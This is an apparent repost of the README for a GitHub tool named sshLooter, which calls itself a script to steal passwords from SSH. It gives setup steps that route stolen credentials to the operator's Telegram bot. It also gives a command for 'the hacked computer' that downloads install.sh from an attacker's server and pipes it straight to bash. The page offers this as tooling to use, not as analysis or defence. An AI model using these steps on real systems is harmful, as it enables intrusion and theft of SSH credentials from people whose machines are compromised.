mthbernardes/sshLooter: Script to steal passwords from ssh.
2018-02-18 17:56:09
Author: github.com(查看原文)
阅读量:192
收藏
Join GitHub today
GitHub is home to over 20 million developers working together to host and review code, manage projects, and build software together.
Sign up
Shell
Python
README.md
Script to steal passwords from ssh.
git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter
Edit the script on install.sh, and add your telegram bot api, and your userid.
Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.
On your server execute.
python -m SimpleHTTPServer
On the hacked computer execute.
curl http://yourserverip:8000/install.sh | bash
ChokePoint
Stealing SSH credentials Another Approach.
文章来源: https://github.com/mthbernardes/sshLooter
如有侵权请联系:admin#unsafe.sh